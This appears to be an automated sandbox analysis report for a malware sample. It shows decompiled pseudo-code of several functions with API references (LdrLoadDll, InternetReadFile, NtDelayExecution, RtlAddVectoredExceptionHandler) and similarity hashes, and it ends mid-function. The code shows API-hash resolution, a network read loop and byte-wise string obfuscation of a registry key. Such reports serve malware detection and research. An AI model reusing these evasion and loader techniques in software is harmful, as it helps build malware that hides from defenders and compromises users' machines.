						E003B8CA0(_t426 + 0x268);
					}
					_t138 =  *0x3db208; // 0x2685a38
					E003B88C0(_t426 + 0x274, _t138 + 0x38);
					E003B8CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E003B1030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E003B8810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E003B8810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E003B8810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E003B8810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E003B8810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E003B8810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E003B8810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E003B8810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E003B8810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E003B8810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x3db208 = _t422;
					}
					if(E003B9DC0(_t422 + 0x30) != 0) {
						E003B8810(_t426 + 0x27c, 0x80);
						_t363 =  *0x3db1f4; // 0x2661568
						if(_t363 == 0xc139578) {
							 *0x3db1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = E003B7564(0xa1310f65);
								if(_t424 == 0) {
									if(E003B6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = E003B7564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E003B67C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t7 = _t363 + 0x180; // 0x26890a8
									_t363 =  *_t7;
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(E003B9DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E003B96D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x3db208; // 0x2685a38
						E003B8CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E003B8CA0(_t426 + 0x278);
					}
					_t246 =  *0x3db208; // 0x2685a38
					E003B88C0(_t426 + 0x2c0, _t246 + 0x30);
					E003B8CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E003B8CA0(_t291);
				_t143 = E003C0220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E003B8810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E003C9470(_t426 + 0x2ac,  &E003DA1A0, 0x28);
				_t147 = E003C9640(_t426 + 0x2a8, 0);
				E003CE780(_t278, _t147, E003C9650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E003C9640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E003B7CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x3da1c8);
				E003CE5D0(_t151, 0x28, _t407);
				E003C9510(_t426 + 0x2a4);
				E003C0220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E003B8CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E003B8AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E003CCEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E003B8CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E003CCE70(_t382);
						}
					}
					 *_t426 = 0;
					E003B8CA0(_t426 + 0x2cc);
					E003B8CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E003B8AB0(_t426 + 0x2e8, _t408, 0);
						E003B9E70(_t426 + 0x2e4, _t401);
						E003B83B0(_t426 + 0x2f0);
						_t170 = E003CD620( *((intOrPtr*)(_t426 + 0x2f0)), E003C6040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E003C0B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E003B8CA0(_t401);
						E003B8CA0(_t426 + 0x2e0);
						if(E003CD0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E003B8CA0(_t401);
					E003B88C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E003C0220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E003C0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E003C9350(_t426 + 0x284);
					_t418 = E003C9640(_t426 + 0x284, 0);
					_t183 = E003C9640(_t426 + 0x284, 8);
					_t402 = E003C0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E003C01B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x3db1f4; // 0x2661568
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x3db1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = E003B7564(0x588ab3ea);
							if(_t281 == 0) {
								if(E003B6C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = E003B7564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E003B67C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E003C9640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											E003C9510(_t426 + 0x280);
											E003B8CA0(_t426 + 0x2b4);
											E003B8CA0(_t426 + 0x2e0);
											E003B8CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E003CCE70(_t390);
												}
											}
											 *_t426 = 0;
											E003B8CA0(_t426 + 0x2cc);
											E003B8CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											E003C9510(_t426 + 0x280);
											E003B8CA0(_t426 + 0x2b4);
											E003B8CA0(_t426 + 0x2e0);
											E003B8CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
												if(_t206 == 0) {
													E003CCE70(_t391);
												}
											}
											 *_t426 = 0;
											E003B8CA0(_t426 + 0x2cc);
											E003B8CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t67 = _t389 + 0x180; // 0x26890a8
								_t389 =  *_t67;
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x003b6c5a
0x003b6c65
0x003b6c73
0x003b6c7a
0x003b6c7f
0x003b6c89
0x003b735c
0x003b74c4
0x003b74ce
0x003b74d0
0x003b74d5
0x003b7551
0x003b74d7
0x003b74d9
0x003b74dd
0x003b74e0
0x003b74e3
0x003b74ea
0x003b74ed
0x003b74f4
0x003b74f7
0x003b74fe
0x003b7501
0x003b7508
0x003b750b
0x003b7512
0x003b7515
0x003b751c
0x003b751f
0x003b7526
0x003b7529
0x003b7530
0x003b7533
0x003b7538
0x003b753d
0x003b753d
0x003b7540
0x003b7544
0x003b7549
0x003b754c
0x003b754c
0x003b754f
0x003b7553
0x003b7553
0x003b736e
0x003b7380
0x003b7385
0x003b7391
0x003b74b5
0x00000000
0x003b7397
0x003b7399
0x003b73c8
0x003b73cd
0x003b73d3
0x003b73d7
0x003b748c
0x003b7497
0x003b749d
0x003b749d
0x003b748c
0x003b73df
0x003b73e8
0x003b73f0
0x00000000
0x003b73f0
0x003b739b
0x003b739d
0x003b739d
0x003b739f
0x003b73a1
0x003b73af
0x003b73b0
0x003b73b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b73b6
0x003b74a4
0x003b74aa
0x003b73f2
0x003b73f4
0x003b7407
0x003b7407
0x003b74b0
0x00000000
0x003b74b0
0x00000000
0x003b73b8
0x003b73b8
0x003b73be
0x003b73be
0x003b73c4
0x00000000
0x003b739d
0x003b7399
0x003b7409
0x003b741b
0x003b7426
0x003b7426
0x003b742b
0x003b743b
0x003b7447
0x003b7447
0x003b744c
0x003b745c
0x003b746f
0x003b7474
0x003b6c8f
0x003b6c95
0x003b72bc
0x003b72c6
0x003b72c8
0x003b72cd
0x003b7349
0x003b72cf
0x003b72d1
0x003b72d5
0x003b72d8
0x003b72db
0x003b72e2
0x003b72e5
0x003b72ec
0x003b72ef
0x003b72f6
0x003b72f9
0x003b7300
0x003b7303
0x003b730a
0x003b730d
0x003b7314
0x003b7317
0x003b731e
0x003b7321
0x003b7328
0x003b732b
0x003b7330
0x003b7335
0x003b7335
0x003b7338
0x003b733c
0x003b7341
0x003b7344
0x003b7344
0x003b7347
0x003b734b
0x003b734b
0x003b6ca7
0x003b6cb9
0x003b6cbe
0x003b6cca
0x003b72ad
0x00000000
0x003b6cd0
0x003b6cd2
0x003b6d01
0x003b6d06
0x003b6d0c
0x003b6d10
0x003b7284
0x003b728f
0x003b7295
0x003b7295
0x003b7284
0x003b6d18
0x003b6d21
0x003b6d29
0x00000000
0x003b6d29
0x003b6cd4
0x003b6cd6
0x003b6cd6
0x003b6cd8
0x003b6cda
0x003b6ce8
0x003b6ce9
0x003b6cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6cef
0x003b729c
0x003b72a2
0x003b6d2b
0x003b6d2d
0x003b6d40
0x003b6d40
0x00000000
0x003b72a8
0x00000000
0x003b72a8
0x00000000
0x003b6cf1
0x003b6cf1
0x003b6cf7
0x003b6cf7
0x003b6cfd
0x00000000
0x003b6cd6
0x003b6cd2
0x003b6d42
0x003b6d54
0x003b6d5f
0x003b6d5f
0x003b6d64
0x003b6d74
0x003b6d80
0x003b6d80
0x003b6d85
0x003b6d95
0x003b6da8
0x003b6dad
0x003b6dad
0x003b6db4
0x003b6dc9
0x003b6ddc
0x003b6de1
0x003b6df1
0x003b6dfb
0x003b6e09
0x003b6e20
0x003b6e27
0x003b6e2e
0x003b6e35
0x003b6e3c
0x003b6e47
0x003b6e57
0x003b6e6a
0x003b6e6b
0x003b6e70
0x003b6e72
0x003b6e77
0x003b6e7c
0x003b6e88
0x003b6e98
0x003b6ea4
0x003b6eab
0x003b6eae
0x003b6eb3
0x003b6eb7
0x003b6ecb
0x003b6ed0
0x003b6edd
0x003b71d9
0x003b71dd
0x003b71e7
0x003b71e9
0x003b71ee
0x003b71f9
0x003b71f5
0x003b71f5
0x003b71f5
0x003b7200
0x003b7203
0x003b7203
0x003b7200
0x003b7208
0x003b7216
0x003b7222
0x003b7233
0x003b6ee3
0x003b6ee3
0x003b6ee9
0x003b6eed
0x003b6ef4
0x003b6efe
0x003b6f0b
0x003b6f1e
0x003b6f3a
0x003b6f48
0x003b6f4f
0x00000000
0x00000000
0x003b71b8
0x003b71c4
0x003b71d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b71d3
0x003b6f57
0x003b6f6b
0x003b6f80
0x003b6f85
0x003b6f9c
0x003b6fa4
0x003b6fb7
0x003b6fc2
0x003b6fd5
0x003b6fdd
0x003b6fe3
0x003b6feb
0x003b6fef
0x003b6ff4
0x003b6ffa
0x003b700b
0x003b7269
0x00000000
0x003b7011
0x003b7013
0x003b7042
0x003b7047
0x003b704d
0x003b7051
0x003b7240
0x003b724b
0x003b7251
0x003b7251
0x003b7240
0x003b7059
0x00000000
0x003b705f
0x003b7066
0x003b706e
0x00000000
0x003b706e
0x003b7015
0x003b7017
0x003b7017
0x003b7019
0x003b701b
0x003b7029
0x003b702a
0x003b7030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7030
0x003b7258
0x003b725e
0x003b7070
0x003b7072
0x003b7126
0x003b712e
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7078
0x003b7093
0x003b709d
0x003b70a7
0x003b70ae
0x003b70ba
0x003b70c6
0x003b70cf
0x003b70d9
0x003b70db
0x003b70e0
0x003b70eb
0x003b70e7
0x003b70e7
0x003b70e7
0x003b70f2
0x003b70f5
0x003b70f5
0x003b70f2
0x003b70fa
0x003b7108
0x003b7114
0x003b7125
0x003b7134
0x003b7134
0x003b713b
0x003b7147
0x003b7153
0x003b715c
0x003b7166
0x003b7168
0x003b716d
0x003b7178
0x003b7174
0x003b7174
0x003b7174
0x003b717f
0x003b7182
0x003b7182
0x003b717f
0x003b7187
0x003b7195
0x003b71a1
0x003b71b5
0x003b71b5
0x003b709d
0x003b7264
0x00000000
0x003b7264
0x00000000
0x003b7032
0x003b7032
0x003b7038
0x003b7038
0x003b703e
0x00000000
0x003b7017
0x003b7013
0x003b700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 003B7093

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ae2864e61ec5994c5ce2758faf4ca0f9280378249335d1249d79076451b896a6
Instruction ID: 46c0326283f050dfd66a598a247441a26985c07c04384557ee385679626a25c4
Opcode Fuzzy Hash: ae2864e61ec5994c5ce2758faf4ca0f9280378249335d1249d79076451b896a6
Instruction Fuzzy Hash: 5D22C1302183419BD766FB24CC96BEE73A8EF90308F50492DE6499E9D2EF709D05C792

Uniqueness

Uniqueness Score: -1.00%

Function 003D39F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E003D39F9(void* __eax, signed int __ebx, void* __edi) {
				long _t42;
				void* _t60;
				long _t63;
				long _t64;
				void* _t79;
				void* _t81;
				signed int _t86;
				void* _t124;
				void* _t128;
				void* _t133;
				long* _t134;
				void* _t139;

				_t124 = __edi;
				_t86 = __ebx;
				if(__eax == 0) {
					_t42 = E003B7F00();
					__eflags = _t42;
					if(_t42 != 0) {
						 *_t134 = _t42;
						E003B8CA0(_t139 + 0x34);
						E003B8CA0(_t139 + 0x44);
						goto L14;
					} else {
						goto L1;
					}
				} else {
					L1:
					E003B83B0(_t139 + 0x2c);
					E003C0B30(_t139 + 0x40,  *((intOrPtr*)(_t139 + 0x34)),  *((intOrPtr*)(_t139 + 0x2c)));
					E003C0B10(_t139 + 0x2c);
					_t130 = _t139;
					E003C50A0(_t139 + 0x44, _t139, 0x3d9424);
					E003C3B00(_t86, _t130);
					E003C7560(_t130, _t124, _t130);
					 *((char*)( *((intOrPtr*)(E003C7600(_t86, 0))))) = 0;
					_t143 = _t134[0xa] - 1;
					if(_t134[0xa] > 1) {
						 *(_t139 + 0xc) = _t134;
						_t128 = 1;
						_t133 = _t139 + 0x54;
						while(1) {
							_t79 = E003C7600(_t86, _t128);
							_push(1);
							_push(0x3da9e0);
							E003B1BA0(_t143, _t133);
							_t81 = E003C0ED0(_t79, _t128,  *((intOrPtr*)(_t139 + 0x54)));
							E003C0B10(_t133);
							if(_t81 != 0) {
								break;
							}
							_t128 = _t128 + 1;
							if(_t128 <  *_t86) {
								continue;
							} else {
								_t134 =  *(_t139 + 0xc);
							}
							goto L6;
						}
						_t134 =  *(_t139 + 0xc);
						 *((char*)( *((intOrPtr*)(E003C7600(_t86, _t128))))) = 0;
					}
					L6:
					E003C3EC0(_t86);
					_push(0);
					E003C9350(_t139 + 0x10);
					_push(0x2800);
					E003C9350(_t139 + 0x20);
					while(1) {
						 *(_t139 + 0x5c) = 0;
						if(E003B15C0(0xd27f045a, 0x547ac48e) == 0) {
							break;
						}
						_t60 = E003C9640(_t139 + 0x20, 0);
						_t63 = InternetReadFile(_t134[4], _t60, E003C9650(_t139 + 0x1c), _t139 + 0x5c); // executed
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E003B7F00();
							__eflags = _t64;
							if(_t64 != 0) {
								L9:
								 *_t134 = _t64;
								E003C9510(_t139 + 0x1c);
								E003C9510(_t139 + 0xc);
								E003B8CA0(_t139 + 0x34);
								E003B8CA0(_t139 + 0x44);
								L14:
								E003C0B10(_t139 + 0x3c);
								_push(0);
								E003C9350( *((intOrPtr*)(_t139 + 0x78)));
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								goto L11;
							}
						} else {
							L11:
							__eflags =  *(_t139 + 0x5c);
							if( *(_t139 + 0x5c) == 0) {
								_push(_t139 + 0xc);
								E003C93D0( *((intOrPtr*)(_t139 + 0x78)));
								E003C9510(_t139 + 0x1c);
								E003C9510(_t139 + 0xc);
								E003B8CA0(_t139 + 0x34);
								E003B8CA0(_t139 + 0x44);
								E003C0B10(_t139 + 0x3c);
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								E003C9710(_t139 + 0x14, E003C9640(_t139 + 0x20, 0),  *(_t139 + 0x5c));
								continue;
							}
						}
						goto L22;
					}
					_t64 = 0x7f;
					goto L9;
				}
				L22:
			}

0x003d39f9
0x003d39f9
0x003d39fb
0x003d3c44
0x003d3c49
0x003d3c4b
0x003d3b6d
0x003d3b74
0x003d3b7d
0x00000000
0x003d3c51
0x00000000
0x003d3c51
0x003d3a01
0x003d3a01
0x003d3a09
0x003d3a16
0x003d3a1f
0x003d3a24
0x003d3a31
0x003d3a39
0x003d3a40
0x003d3a50
0x003d3a53
0x003d3a57
0x003d3a59
0x003d3a5d
0x003d3a62
0x003d3a66
0x003d3a69
0x003d3a70
0x003d3a72
0x003d3a78
0x003d3a83
0x003d3a8c
0x003d3a95
0x00000000
0x00000000
0x003d3a9b
0x003d3a9e
0x00000000
0x003d3aa0
0x003d3aa0
0x003d3aa0
0x00000000
0x003d3a9e
0x003d3c30
0x003d3c3c
0x003d3c3c
0x003d3aa4
0x003d3aa6
0x003d3aab
0x003d3ab1
0x003d3ab6
0x003d3abf
0x003d3ac4
0x003d3ac4
0x003d3adf
0x00000000
0x00000000
0x003d3b1b
0x003d3b35
0x003d3b37
0x003d3b39
0x003d3c1c
0x003d3c21
0x003d3c23
0x003d3ae6
0x003d3ae6
0x003d3aed
0x003d3af6
0x003d3aff
0x003d3b08
0x003d3bb1
0x003d3bb5
0x003d3bba
0x003d3bc0
0x003d3bd0
0x003d3c29
0x00000000
0x003d3c29
0x003d3b3f
0x003d3b3f
0x003d3b3f
0x003d3b44
0x003d3bd7
0x003d3bdc
0x003d3be5
0x003d3bee
0x003d3bf7
0x003d3c00
0x003d3c09
0x003d3c19
0x003d3b4a
0x003d3b5e
0x00000000
0x003d3b5e
0x003d3b44
0x00000000
0x003d3b39
0x003d3ae1
0x00000000
0x003d3ae1
0x00000000

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 003D3B35

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 85a2446335276da2fb61dc17b2b26f5b6edd2aeb4bec9486995b62f40c198ab9
Instruction ID: ce1313fb07d49d9efaed9ef34a7524d080a770eba60d5c9f00fdf3471122003e
Opcode Fuzzy Hash: 85a2446335276da2fb61dc17b2b26f5b6edd2aeb4bec9486995b62f40c198ab9
Instruction Fuzzy Hash: EA515F322182049FD707FB24D852FAEB3A4AF90744F51482EF5969B292DF319E09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003B22A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E003B22A0(void* __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v24;
				intOrPtr* _t10;
				void* _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t19 = __edx;
				_t24 =  &_v8;
				if(__ecx == 0) {
					 *_t24 = 0;
					_v8 = 0;
				} else {
					 *_t24 = E003B1230(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v24 = _t19;
				}
				_t20 =  *0x3db1f4; // 0x2661568
				if(_t20 == 0xc139578) {
					 *0x3db1f4 = 0;
					_t20 = 0;
				}
				if(_t20 == 0) {
					L10:
					_push(0x588ab3ea);
					_t10 = E003B7564(0x588ab3ea);
					_t23 = _t10;
					if(_t23 == 0) {
						_t10 = E003B6C50(0x588ab3ea);
						if(_t10 != 0) {
							_push(0x588ab3ea);
							_t10 = E003B7564(0x588ab3ea);
							_t23 = _t10;
						}
					}
					if(_t23 == 0) {
						goto L15;
					} else {
						_t24 = _t24 + 0xfffffff8;
						_t10 = E003B67C8(_t23, 0xcd123e03);
						_t22 = _t10;
						goto L13;
					}
				} else {
					do {
						_t18 = 0;
						_t10 = 0;
						while( *((intOrPtr*)(_t10 + _t20 + 8)) != 0xcd123e03) {
							_t18 = _t18 + 1;
							_t10 = _t10 + 0x18;
							if(_t18 < 0x10) {
								continue;
							}
							goto L9;
						}
						_t22 =  *((intOrPtr*)(_t10 + _t20 + 0x14));
						if(_t22 != 0) {
							L13:
							if(_t22 == 0) {
								L15:
								return _t10;
							}
							_t13 =  *_t22(0, _t24); // executed
							return _t13;
						}
						goto L10;
						L9:
						asm("o16 nop [eax+eax]");
						_t5 = _t20 + 0x180; // 0x26890a8
						_t20 =  *_t5;
					} while (_t20 != 0);
					goto L10;
				}
			}

0x003b22a0
0x003b22a1
0x003b22a6
0x003b22c2
0x003b22c5
0x003b22a8
0x003b22b7
0x003b22ba
0x003b22ba
0x003b22c9
0x003b22d5
0x003b22d7
0x003b22e1
0x003b22e1
0x003b22e5
0x003b230e
0x003b2313
0x003b2314
0x003b2319
0x003b231d
0x003b234a
0x003b2351
0x003b2358
0x003b2359
0x003b235e
0x003b235e
0x003b2351
0x003b2321
0x00000000
0x003b2323
0x003b232a
0x003b232d
0x003b2332
0x00000000
0x003b2332
0x003b22e7
0x003b22e7
0x003b22e7
0x003b22e9
0x003b22eb
0x003b22f5
0x003b22f6
0x003b22fc
0x00000000
0x00000000
0x00000000
0x003b22fc
0x003b2362
0x003b2368
0x003b2334
0x003b2336
0x003b2344
0x003b2344
0x003b2344
0x003b233e
0x00000000
0x003b233e
0x00000000
0x003b22fe
0x003b22fe
0x003b2304
0x003b2304
0x003b230a
0x00000000
0x003b22e7

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 003B233E

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 71ed0153598cb40a1b345394d52c13502e78d5527952cac07f367942e51965b8
Instruction ID: 352d5d86664f7b860aa49212d426bd6b18abaad2e1454c953bf7d2f711f85ec4
Opcode Fuzzy Hash: 71ed0153598cb40a1b345394d52c13502e78d5527952cac07f367942e51965b8
Instruction Fuzzy Hash: 67112C34F082124BD66BA7284C417AB71DAAF8471CF2AC72DD649DFE85EA34CC018291

Uniqueness

Uniqueness Score: -1.00%

Function 003B7A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E003B7A60(intOrPtr* __ecx) {
				void* _t1;

				_push(E003B7D40);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x003b7a60
0x003b7a65
0x003b7a67
0x003b7a69

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,003B7D40,003B7A11,588AB3EA,?,?,003A5168,00000001), ref: 003B7A67

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 774aa3e46a3b775277e5c3f9ad99af3d35e8aaf34fab1df52061025b1d4f44d7
Instruction ID: 3f8675a426552783f24c3a3f07b48e79c7a2189a216afa372abbb2dc61178c75
Opcode Fuzzy Hash: 774aa3e46a3b775277e5c3f9ad99af3d35e8aaf34fab1df52061025b1d4f44d7
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10002210, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002210() {
				long _v8;
				char* _v12;
				intOrPtr _v16;
				long _t374;
				intOrPtr _t536;

				_v16 = RegOpenKeyA;
				_v12 = "interface\\{b196b287-bab4-101a-b69c-00aa00341d07}";
				 *_v12 = 0x9c;
				 *_v12 = ( *_v12 & 0x000000ff) - 0x33;
				_v12[1] = 0xa1;
				_t9 =  &(_v12[1]); // 0x7265746e
				_v12[1] = ( *_t9 & 0x000000ff) - 0x33;
				_v12[2] = 0xa7;
				_t15 =  &(_v12[2]); // 0x66726574
				_v12[2] = ( *_t15 & 0x000000ff) - 0x33;
				_v12[3] = 0x98;
				_t21 =  &(_v12[3]); // 0x61667265
				_v12[3] = ( *_t21 & 0x000000ff) - 0x33;
				_v12[4] = 0xa5;
				_t27 =  &(_v12[4]); // 0x63616672
				_v12[4] = ( *_t27 & 0x000000ff) - 0x33;
				_v12[5] = 0x99;
				_t33 =  &(_v12[5]); // 0x65636166
				_v12[5] = ( *_t33 & 0x000000ff) - 0x33;
				_v12[6] = 0x94;
				_t39 =  &(_v12[6]); // 0x5c656361
				_v12[6] = ( *_t39 & 0x000000ff) - 0x33;
				_v12[7] = 0x96;
				_t45 =  &(_v12[7]); // 0x7b5c6563
				_v12[7] = ( *_t45 & 0x000000ff) - 0x33;
				_v12[8] = 0x98;
				_t51 =  &(_v12[8]); // 0x627b5c65
				_v12[8] = ( *_t51 & 0x000000ff) - 0x33;
				_v12[9] = 0x8f;
				_t57 =  &(_v12[9]); // 0x31627b5c
				_v12[9] = ( *_t57 & 0x000000ff) - 0x33;
				_v12[0xa] = 0xae;
				_t63 =  &(_v12[0xa]); // 0x3931627b
				_v12[0xa] = ( *_t63 & 0x000000ff) - 0x33;
				_v12[0xb] = 0x95;
				_t69 =  &(_v12[0xb]); // 0x36393162
				_v12[0xb] = ( *_t69 & 0x000000ff) - 0x33;
				_v12[0xc] = 0x64;
				_t75 =  &(_v12[0xc]); // 0x62363931
				_v12[0xc] = ( *_t75 & 0x000000ff) - 0x33;
				_v12[0xd] = 0x6c;
				_t81 =  &(_v12[0xd]); // 0x32623639
				_v12[0xd] = ( *_t81 & 0x000000ff) - 0x33;
				_v12[0xe] = 0x69;
				_t87 =  &(_v12[0xe]); // 0x38326236
				_v12[0xe] = ( *_t87 & 0x000000ff) - 0x33;
				_v12[0xf] = 0x95;
				_t93 =  &(_v12[0xf]); // 0x37383262
				_v12[0xf] = ( *_t93 & 0x000000ff) - 0x33;
				_v12[0x10] = 0x65;
				_v12[0x10] = (_v12[0x10] & 0x000000ff) - 0x33;
				_v12[0x11] = 0x6b;
				_v12[0x11] = (_v12[0x11] & 0x000000ff) - 0x33;
